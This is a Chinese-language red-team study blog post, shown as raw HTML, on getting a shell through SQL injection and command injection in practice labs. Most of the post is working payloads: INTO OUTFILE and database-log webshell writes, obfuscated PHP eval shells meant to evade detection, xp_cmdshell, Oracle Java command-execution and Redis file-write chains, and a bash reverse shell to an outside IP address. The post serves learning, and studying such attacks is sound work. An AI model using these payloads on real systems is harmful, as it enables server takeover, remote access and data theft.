

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Avatar.jpg">
  <link rel="icon" href="/img/Avatar.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suuuu">
  <meta name="keywords" content="blog">
  
    <meta name="description" content="sql注入php这里挑选最简单的数字型sql注入进行学习这里的漏洞点就发生在query中$query&#x3D;&quot;select username,email from member where id&#x3D;$id&quot;;这里存在sql注入漏洞的原因是：这里的id我们是可控的，没有进行任何过滤，会直接通过execute执行sql语句我们单独把这个sql语句拿出来看看select username,e">
<meta property="og:type" content="article">
<meta property="og:title" content="getshell手法小记">
<meta property="og:url" content="https://www.susec.xyz/2024/11/11/getshell%E6%89%8B%E6%B3%95/index.html">
<meta property="og:site_name" content="suuuu&#39;s blog">
<meta property="og:description" content="sql注入php这里挑选最简单的数字型sql注入进行学习这里的漏洞点就发生在query中$query&#x3D;&quot;select username,email from member where id&#x3D;$id&quot;;这里存在sql注入漏洞的原因是：这里的id我们是可控的，没有进行任何过滤，会直接通过execute执行sql语句我们单独把这个sql语句拿出来看看select username,e">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808848.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808788.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808839.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808842.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808846.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808845.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808858.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808924.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808971.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808057.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808108.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808258.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808942.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808938.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808500.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808475.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808690.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808838.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808237.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808239.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808410.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808001.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808010.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808503.png">
<meta property="og:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808302.png">
<meta property="article:published_time" content="2024-11-11T03:11:11.000Z">
<meta property="article:modified_time" content="2025-03-09T09:10:23.096Z">
<meta property="article:author" content="suuuu">
<meta property="article:tag" content="getshell">
<meta property="article:tag" content="top10">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808848.png">
  
  
  
  <title>getshell手法小记 - suuuu&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.susec.xyz","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suuuu</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/BlackRoses.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="getshell手法小记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-11-11 11:11" pubdate>
          2024年11月11日 上午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          31 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">getshell手法小记</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="sql注入"><a href="#sql注入" class="headerlink" title="sql注入"></a>sql注入</h2><h3 id="php"><a href="#php" class="headerlink" title="php"></a>php</h3><p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808848.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>这里挑选最简单的数字型sql注入进行学习<br>这里的漏洞点就发生在query中<br><code>$query=&quot;select username,email from member where id=$id&quot;;</code><br>这里存在sql注入漏洞的原因是：这里的id我们是可控的，没有进行任何过滤，会直接通过execute执行sql语句<br>我们单独把这个sql语句拿出来看看<br><code>select username,email from member where id=$id</code><br>当id值为1时<br>它的语句就是<br><code>select username,email from member where id=1</code><br>我们看看它的结果<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808788.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>我们看到了正常的内容，且与我们直接在mysql中执行sql语句看到的内容一样<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808839.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>在sql查询中，有union select这一操作符，通过这一操作符，我们可以实现合并两个或多个 SELECT 语句的结果<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808842.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>可以看到，我们这样就能查询到1，2<br>但是在网页上我们只能看到第一行的结果，这时我们有两个选择，一个是将id设置为一个不存在的值，可以是-1，0，又或是像10086这样足够大的值，前提是我们知道这个值代表的列在数据库中为空<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808846.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>这样我们就能在第一行看到我们想要的内容<br>第二种选择，是通过limit的方式，跳过第一行，从第二行开始显示<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808845.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>当然我说的是我平时遇到的常规情况，但我发现这个靶场似乎可以同时显示两个数据<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808858.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>那么，我们就可以通过union select的方式，去查询数据库的一些敏感信息，比如数据库名称，数据库版本，数据库用户名等等<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808924.png" srcset="/img/loading.gif" lazyload alt="image.png"><br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808971.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>至此我们学会了php中最基本的sql注入<br>当然这是最简单的理想情况，我们还需要看他有没有预编译，过滤之类的，因为是红队课，我们的目标肯定是getshell<br>这里再写下如何通过sql注入getshell</p>
<h4 id="outfile和dumpfile写shell"><a href="#outfile和dumpfile写shell" class="headerlink" title="outfile和dumpfile写shell"></a>outfile和dumpfile写shell</h4><h5 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h5><p>过滤了单引号into outfile还能用吗？不能，GPC要off才行，可以测试Hex编码</p>
<blockquote>
<ol>
<li>数据库当前用户为root权限；</li>
<li>知道当前网站的绝对路径；</li>
<li><code>PHP</code>的<code>GPC</code>为 off状态；(魔术引号，GET，POST，Cookie)</li>
<li>写入的那个路径存在写入权限。</li>
</ol>
</blockquote>
<h6 id="基于UNION联合查询："><a href="#基于UNION联合查询：" class="headerlink" title="基于UNION联合查询："></a><strong>基于UNION联合查询</strong>：</h6><figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">?id=1 UNION ALL SELECT 1,&#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27;,3 into outfile &#x27;C:\info.php&#x27;%23</span><br><span class="language-xml">?id=1 UNION ALL SELECT 1,&#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27;,3 into dumpfile &#x27;C:\info.php&#x27;%23</span><br></code></pre></td></tr></table></figure>

<h6 id="非联合查询"><a href="#非联合查询" class="headerlink" title="非联合查询"></a><strong>非联合查询</strong></h6><p>当我们无法使用联合查询时，我们可以使用<code>fields terminated by</code>与<code>lines terminated by</code>来写shell</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">?id=1 into outfile &#x27;C:\info.php&#x27; FIELDS TERMINATED BY &#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27;%23</span><br></code></pre></td></tr></table></figure>

<p><strong>代替空格的方法</strong><br>+号，<code>%0a</code>、<code>%0b</code>、<code>%a0</code> 、 &#x2F;**&#x2F; 注释符等<br><code>outfile</code>和<code>dumpfile</code>的区别</p>
<p><code>outfile</code>:</p>
<blockquote>
<p>1、 支持多行数据同时导出</p>
<p>2、 使用union联合查询时，要保证两侧查询的列数相同</p>
<p>3、 会在换行符制表符后面追加反斜杠</p>
<p>4、会在末尾追加换行</p>
</blockquote>
<p><code>dumpfile</code>:</p>
<blockquote>
<p>1、 每次只能导出一行数据</p>
<p>2、 不会在换行符制表符后面追加反斜杠</p>
<p>3、 不会在末尾追加换行</p>
</blockquote>
<p>因此，我们可以使用<code>into dumpfile</code>这个函数来顺利写入二进制文件;</p>
<p>当然<code>into outfile</code>函数也可以写入二进制文件，只是最终无法生效罢了（追加的反斜杠会使二进制文件无法生效）</p>
<p>如果服务器端本身的查询语句，结果有多行，但是我们又想使用<code>dump file</code>，应该手动添加 limit 限制</p>
<h4 id="突破secure-file-priv写shell"><a href="#突破secure-file-priv写shell" class="headerlink" title="突破secure-file-priv写shell"></a>突破<code>secure-file-priv</code>写shell</h4><p><code>MySQL</code>的<code>secure-file-priv</code>参数是用来限制LOAD DATA, SELECT … <code>OUTFILE</code>, and LOAD_FILE()传到哪个指定目录的。</p>
<p>当<code>secure_file_priv</code>的值没有具体值时，表示不对<code>MySQL</code>的导入|导出做限制，如果是null，表示<code>MySQL</code>不允许导入导出。</p>
<p>而且在<code>mysql 5.6.34</code>版本以后 <code>secure_file_priv</code> 的值默认为NULL。并且无法用<code>SQL</code>语句对其进行修改。</p>
<h4 id="基于日志写shell"><a href="#基于日志写shell" class="headerlink" title="基于日志写shell"></a><strong>基于日志写shell</strong></h4><p>（ <code>outfile</code>被禁止，或者写入文件被拦截，没写权限 ，有root权限）</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">show variables like &#x27;%general%&#x27;;	--查看配置，日志是否开启，和mysql默认log地址(记下原地址方便恢复)</span><br><span class="language-xml">set global general_log = on;		--开启日志监测，默认关闭(如果一直开文件会很大的)</span><br><span class="language-xml">set global general_log_file = &#x27;/var/www/html/info.php&#x27;;		--设置日志路径</span><br><span class="language-xml">select &#x27;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&#x27;;		--执行查询，写入shell</span><br><span class="language-xml">--结束后，恢复日志路径，关闭日志监测</span><br><span class="language-xml"></span><br><span class="language-xml">--SQL查询免杀shell</span><br><span class="language-xml">select &quot;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-variable">$sl</span> = <span class="hljs-title function_ invoke__">create_function</span>(<span class="hljs-string">&#x27;&#x27;</span>, @<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;klion&#x27;</span>]);<span class="hljs-variable">$sl</span>();<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&quot;;</span><br><span class="language-xml"></span><br><span class="language-xml">SELECT &quot;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-variable">$p</span> = <span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;f&#x27;</span>=&gt;<span class="hljs-string">&#x27;a&#x27;</span>,<span class="hljs-string">&#x27;pffff&#x27;</span>=&gt;<span class="hljs-string">&#x27;s&#x27;</span>,<span class="hljs-string">&#x27;e&#x27;</span>=&gt;<span class="hljs-string">&#x27;fffff&#x27;</span>,<span class="hljs-string">&#x27;lfaaaa&#x27;</span>=&gt;<span class="hljs-string">&#x27;r&#x27;</span>,<span class="hljs-string">&#x27;nnnnn&#x27;</span>=&gt;<span class="hljs-string">&#x27;t&#x27;</span>);<span class="hljs-variable">$a</span> = <span class="hljs-title function_ invoke__">array_keys</span>(<span class="hljs-variable">$p</span>);<span class="hljs-variable">$_</span>=<span class="hljs-variable">$p</span>[<span class="hljs-string">&#x27;pffff&#x27;</span>].<span class="hljs-variable">$p</span>[<span class="hljs-string">&#x27;pffff&#x27;</span>].<span class="hljs-variable">$a</span>[<span class="hljs-number">2</span>];<span class="hljs-variable">$_</span>= <span class="hljs-string">&#x27;a&#x27;</span>.<span class="hljs-variable">$_</span>.<span class="hljs-string">&#x27;rt&#x27;</span>;<span class="hljs-variable">$_</span>(<span class="hljs-title function_ invoke__">base64_decode</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;username&#x27;</span>]));<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&quot;;</span><br></code></pre></td></tr></table></figure>

<h4 id="慢查询写shell"><a href="#慢查询写shell" class="headerlink" title="慢查询写shell"></a>慢查询写shell</h4><p>为什么要用慢查询写呢？上边说过开启日志监测后文件会很大，网站访问量大的话我们写的shell会出错<br>show variables like ‘%slow_query_log%’;		–查看慢查询信息<br>set global slow_query_log&#x3D;1;				–启用慢查询日志(默认禁用)<br>set global slow_query_log_file&#x3D;’C:\phpStudy\WWW\shell.php’;	–修改日志文件路径<br>select ‘<?php @eval($_POST[abc]);?>‘ or sleep(11);				–写shell</p>
<h5 id="慢查询补充"><a href="#慢查询补充" class="headerlink" title="慢查询补充"></a><strong>慢查询补充</strong></h5><p>因为是用的慢查询日志，所以说只有当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志。</p>
<p>一般都是通过<code>long_query_time</code>选项来设置这个时间值，时间以秒为单位，可以精确到微秒。</p>
<p>如果查询时间超过了这个时间值（默认为10秒），这个查询语句将被记录到慢查询日志中</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">show</span> <span class="hljs-keyword">global</span> variables <span class="hljs-keyword">like</span> <span class="hljs-string">&#x27;%long_query_time%&#x27;</span>		<span class="hljs-comment">--查看服务器默认时间值</span><br></code></pre></td></tr></table></figure>
<h4 id="其它"><a href="#其它" class="headerlink" title="其它"></a>其它</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs sql">mysql<br><span class="hljs-keyword">select</span> <span class="hljs-number">0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e</span> <span class="hljs-keyword">into</span> outfile <span class="hljs-string">&#x27;/var/www/html/1.php&#x27;</span><br><br><span class="hljs-keyword">Sql</span> server<br>存储过程xp_cmdshell<br>;<span class="hljs-keyword">exec</span> master..xp_cmdshell <span class="hljs-string">&#x27;echo ^&lt;%@ Page Language=&quot;Jscript&quot;%^&gt;^&lt;%eval(Request.Item[&quot;pass&quot;],&quot;unsafe&quot;);%^&gt; &gt; D:\\WWW\\2333.aspx&#x27;</span> ;<span class="hljs-comment">--</span><br><br>Oracle<br><span class="hljs-number">1</span>、创建JAVA包<br><span class="hljs-keyword">select</span> dbms_xmlquery.newcontext(<span class="hljs-string">&#x27;declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate &#x27;&#x27;create or replace and compile java source named &quot;LinxUtil&quot; as import java.io.*; public class LinxUtil extends Object &#123;public static String runCMD(String args) &#123;try&#123;BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=&quot;&quot;;while ((stemp = myReader.readLine()) != null) str +=stemp+&quot;\n&quot;;myReader.close();return str;&#125; catch (Exception e)&#123;return e.toString();&#125;&#125;&#125;&#x27;&#x27;;commit;end;&#x27;</span>) <span class="hljs-keyword">from</span> dual;<br><span class="hljs-number">2</span>、JAVA权限<br><span class="hljs-keyword">select</span> dbms_xmlquery.newcontext(<span class="hljs-string">&#x27;declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate &#x27;&#x27;begin dbms_java.grant_permission( &#x27;&#x27;&#x27;&#x27;SYSTEM&#x27;&#x27;&#x27;&#x27;, &#x27;&#x27;&#x27;&#x27;SYS:java.io.FilePermission&#x27;&#x27;&#x27;&#x27;, &#x27;&#x27;&#x27;&#x27;&lt;&lt;ALL FILES&gt;&gt;&#x27;&#x27;&#x27;&#x27;,&#x27;&#x27;&#x27;&#x27;EXECUTE&#x27;&#x27;&#x27;&#x27;);end;&#x27;&#x27;commit;end;&#x27;</span>) <span class="hljs-keyword">from</span> dual;<br><span class="hljs-number">3</span>、创建函数<br><span class="hljs-keyword">select</span> dbms_xmlquery.newcontext(<span class="hljs-string">&#x27;declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate &#x27;&#x27;create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name &#x27;&#x27;&#x27;&#x27;LinxUtil.runCMD(java.lang.String) return String&#x27;&#x27;&#x27;&#x27;; &#x27;&#x27;;commit;end;&#x27;</span>) <span class="hljs-keyword">from</span> dual;<br>URL执行<br>id<span class="hljs-operator">=</span><span class="hljs-number">602</span><span class="hljs-string">&#x27;||utl_inadd.get_host_name((select LinxRUNCMD(&#x27;</span>cmd <span class="hljs-operator">/</span>c dir d:<span class="hljs-operator">/</span><span class="hljs-string">&#x27;) from dual))--</span><br><span class="hljs-string"></span><br><span class="hljs-string">postgresql</span><br><span class="hljs-string">COPY (select &#x27;</span><span class="hljs-operator">&lt;</span>?php phpinfo();?<span class="hljs-operator">&gt;</span><span class="hljs-string">&#x27;) to &#x27;</span><span class="hljs-operator">/</span>tmp<span class="hljs-operator">/</span><span class="hljs-number">1.</span>php<span class="hljs-string">&#x27;;</span><br><span class="hljs-string"></span><br><span class="hljs-string">sqlite3</span><br><span class="hljs-string">;attach database &#x27;</span>D:\\www\\<span class="hljs-number">008.</span>php<span class="hljs-string">&#x27; as tt;create TABLE tt.exp (dataz text) ; insert INTO tt.exp (dataz) VALUES (x&#x27;</span><span class="hljs-number">3</span>c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e<span class="hljs-string">&#x27;);</span><br><span class="hljs-string"></span><br><span class="hljs-string">redis</span><br><span class="hljs-string">%0D%0Aconfig%20set%20dir%20%2Fvar%2Fwww%2Fhtml2F%0D%0Aconfig%20set%20dbfilename%20shell%2Ephp%0D%0Aset%20x%2022%3C%3Fphp%20phpinfo%28%29%3B%%203F%3E%22%0D%0Asave%0D%0A</span><br></code></pre></td></tr></table></figure>
<p>当然如果你懒得手动打，你直接sqlmap后面加个–os-shell就行</p>
<h3 id="java"><a href="#java" class="headerlink" title="java"></a>java</h3><p>java代码审计第一步，看pom.xml，看看它用的是什么数据库交互工具，是jdbc，还是mybatis，又或是冷门点的Hibernate等<br>针对不同的交互工具，我们要查询的点也不一样<br>例如针对jdbc，我们可能就要找createStatement()，executeQuery()<br>针对mybatis，我们第一时间想到的肯定是有没有预编译，直接找${，如果是用的#{，它有没有做错误的预编译，是否存在ordey by注入，like注入等等<br>然后我们要去找它们的拼接点如：+，append()，concat()，join()等等<br>因为这里只是进行简单的学习，我们就针对hello-java这一靶场最简单的sql注入漏洞处进行分析<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808057.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>找到SQLI中的JDBC<br>经典的jdbcsql注入<br>这是一个字符型的sql注入，因为id被两个<code>&#39;</code>包裹了<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808108.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>我们在web端能够直接点击run<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808258.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>可以直接看到漏洞点，具体的漏洞利用方式，跟php大同小异</p>
<h2 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h2><p>这里因为没怎么听说过java命令执行(好像就是没有直接的)，所以只从php角度出发</p>
<h3 id="php-1"><a href="#php-1" class="headerlink" title="php"></a>php</h3><p><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808942.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>一样的，从代码触发，很明显能看到，shell_exec，典型的命令执行函数，会直接调用外部程序去处理内容，我们只需要通过连接符&amp;进行连接，就能做到ping的同时执行我们想要的命令<br>此处payload:127.0.0.1 &amp; whoami<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808938.png" srcset="/img/loading.gif" lazyload alt="image.png"><br>当然，我们可以用别的方式进行拼接<br>Windows系统：</p>
<ul>
<li>|：只执行后面的语句。</li>
<li>||：如果前面的语句执行失败，则执行后面的语句。</li>
<li>&amp;：两条语句都执行，如果前面的语句为假则执行后面的语句，如果前面的语句为真则不执行后面的语句。</li>
<li>&amp;&amp;：如果前面的语句为假，则直接出错，也不再执行后面的语句；前面的语句为真则两条命令都执行，前面的语句只能为真。</li>
</ul>
<p>Linux系统：</p>
<ul>
<li>;：执行完前面的语句再执行后面的语句，当有一条命令执行失败时，不会影响其它语句的执行。</li>
<li>|（管道符）：只执行后面的语句。</li>
<li>||（逻辑或）：只有前面的语句执行出错时，执行后面的语句。</li>
<li>&amp;（后台任务符）：两条语句都执行，如果前面的语句为假则执行后面的语句，如果前面的语句为真则不执行后面的语句。</li>
<li>&amp;&amp;（逻辑与）：如果前面的语句为假则直接出错，也不再执行后面的语句；前面的语句为真则两条命令都执行，前面的语句只能为真。（命令替换）：当一个命令被解析时，它首先会执行反引号之间的操作。例 echo whoami</li>
</ul>
<p>最后再对常见的php命令执行函数进行补充<br>system()，passthru()，exec()，pcntl_exec()，shell_exec()，popen()&#x2F;proc_popen()，反引号 ``<br>这个getshell手法就简单很多，写个反弹shell什么的<br>|  &#x2F;bin&#x2F;sh -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;172.29.61.154&#x2F;1111 0&gt;&amp;1<br>例如这个<br><img src="https://suuuuhexo2.oss-cn-guangzhou.aliyuncs.com/202411081808500.png" srcset="/img/loading.gif" lazyload alt="image.png"></p>
